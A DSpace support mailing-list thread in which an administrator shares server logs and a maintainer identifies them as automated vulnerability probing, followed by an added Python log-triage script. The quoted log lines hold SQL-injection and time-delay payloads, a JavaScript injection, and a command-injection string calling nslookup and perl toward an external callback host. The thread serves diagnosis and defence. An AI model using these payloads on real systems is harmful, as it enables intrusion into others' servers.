Hello Tim, I solved the problem with an IP filter. My concern was that the Angular client stopped working with something more than 10 requests per second. Analyzing the REST API log, I identified that each request started to take up to 10 seconds. Then I restarted the application service (nodejs) and it was working again for a few seconds.
On Thu, Oct 13, 2022 at 13:20, Tim Donohue ([email protected]) wrote:

> Hi Nicolas,
>
> Those logs make it look like someone is attempting to hack into your
> system or find a vulnerability by generating random URLs.
>
> Those "GET /communities/" paths you shared appear to have embedded SQL
> commands and embedded JavaScript. So, they look to be trying to determine
> if there's a way to execute those commands against your system. DSpace
> itself will never access or use URLs of those types.
>
> My recommendation would be to see if you can block the IP address which is
> sending those commands. While none of those commands should do anything in
> DSpace 7, they are obviously up to no good & trying to find a way to hack
> your system.
>
> Overall, I don't see any bugs here in DSpace's behavior based on anything
> you've shared.
>
> Tim
> ------------------------------
> *From:* [email protected] <[email protected]> on
> behalf of Nicolas Battaglia <[email protected]>
> *Sent:* Wednesday, October 12, 2022 3:31 PM
> *To:* DSpace Technical Support <[email protected]>
> *Subject:* [dspace-tech] Support
>
> Hello everybody
>
> I've a problem with my dspace 7.2 PROD server
>
> Today the angular client stopped working, after restarting it it works for
> a few minutes and stops.
>
> In the nodejs console I found messages similar to these
>
> GET
> /communities/6a318891-0c45--1%20OR%202+555-555-1=0+0+0+1-b3b6-4caa1be4af44
> 404 995.928 ms - -
> GET
> /communities/de19a2f4-1be2-8MBJaJkQ'))%20OR%20510=(SELECT%20510%20FROM%20PG_SLEEP(15))--c80-a57a-3814a958fb8e
> 404 1129.742 ms - -
> GET
> /communities/2'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98),15)%7C%7C'a8a3d54-61f6-4663-a293-d7fe02058c76
> 200 800.296 ms - -
> Environment: Production
> GET /communities/6a318891-0c45-1*4277-b3b6-4caa1be4af44 404 779.049 ms - -
> Environment: Production
> Environment: Production
> GET /communities/f824abaf-%7C(nslookup%20hitlerkvauufubbfc3.bxss.me
> %7C%7Cperl%20-e%20%22gethostbyname('hitlerkvauufubbfc3.bxss.me')%22)a85-459f-a087-e521fd3f486f
> 200 1215.078 ms - -
>
> *and, in my dspace.log file, some messages like this:*
>
> 022-10-12 03:51:55,017 ERROR unknown 70ae76ad-f77a-44f3-8932-58586342dc12
> org.dspace.app.rest.utils.DiscoverQueryBuilder @ anonymous::Error in
> Discovery while setting up date facet range:date facet\colon;
> org.dspace.discovery.configuration.DiscoverySearchFilterFacet@20f3548b
> org.dspace.discovery.SearchServiceException: Error from server at
> http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError:
> Cannot parse 'dateIssued_keyword:[2020 TO "+(function(){if(typeof
> xwuYUD==="undefined"){var a=new Date();do{var b=new
> Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP>
> "undefined\"){var "" at line 1, column 62.
> Was expecting one of:
> "]" ...
> "}" ...
>
> at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:726)
> ~[dspace-api-7.1.1.jar:7.1.1]
>
> Caused by:
> org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error
> from server at http://localhost:8983/solr/search:
> org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[2020
> TO "+(function(){if(typeof xwuYUD==="undefined"){var a=new Date();do{var
> b=new Date();}while(b-a<0);xwuYUD=1;}}())+"]': Encountered " <RANGE_GOOP>
> "undefined\"){var "" at line 1, column 62.
> Was expecting one of:
> "]" ...
> "}" ...
>
> by the way, my today dspace log file is 200mb (others days is about 4mb)
>
> any ideas?
>
> thanks
>
> --
> All messages to this mailing list should adhere to the Code of Conduct:
> https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx
> ---
> You received this message because you are subscribed to the Google Groups
> "DSpace Technical Support" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to [email protected].
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/dspace-tech/CAJVJSdBYT-DbZqWjh8Buq0z8T5GbNh2KO5q-d5jjEMqXqi4pjg%40mail.gmail.com
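
Added example, not part of the thread and not DSpace code: a triage script for console lines of the shape quoted above, which counts requests and flags those whose id segment under `/communities/` is not a UUID. `UUID_ROUTES` is an assumption, the first sample line is constructed, and the two flagged sample lines are taken from the thread.

```python
import re
from urllib.parse import unquote

# Shape of the Node.js console lines quoted in the thread: METHOD PATH STATUS TIME ms
LINE_RE = re.compile(r"^([A-Z]+) (\S+) (\d{3}) ([\d.]+) ms\b")
UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)
# Assumption: routes whose second path segment must be a UUID.
UUID_ROUTES = {"communities", "collections", "items"}

# Sample input: first request line is constructed, the two malformed ones are from the thread.
SAMPLE = """\
GET /communities/6a318891-0c45-4277-b3b6-4caa1be4af44 200 310.120 ms - -
Environment: Production
GET /communities/6a318891-0c45--1%20OR%202+555-555-1=0+0+0+1-b3b6-4caa1be4af44 404 995.928 ms - -
GET /communities/6a318891-0c45-1*4277-b3b6-4caa1be4af44 404 779.049 ms - -
GET /home 200 95.300 ms - -
"""


def parse(line):
    """Return (method, path, status, ms), or None for non-request lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group(1), m.group(2), int(m.group(3)), float(m.group(4))


def malformed_id(path):
    """Return the percent-decoded id segment if it is not a UUID, else None."""
    parts = path.split("?", 1)[0].strip("/").split("/")
    if len(parts) >= 2 and parts[0] in UUID_ROUTES:
        if not UUID_RE.match(parts[1]):
            return unquote(parts[1])
    return None


def triage(lines):
    """Count request lines and collect those whose id segment is not a UUID."""
    total, flagged = 0, []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue  # e.g. "Environment: Production"
        total += 1
        bad = malformed_id(rec[1])
        if bad is not None:
            flagged.append({"status": rec[2], "ms": rec[3], "id": bad})
    return {"total": total, "flagged": flagged}


if __name__ == "__main__":
    print(triage(SAMPLE.splitlines()))
```

The console format shown in the thread carries no client address, so this only confirms and sizes the probing; the address for the IP filter has to come from a reverse proxy or REST API access log that records it.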
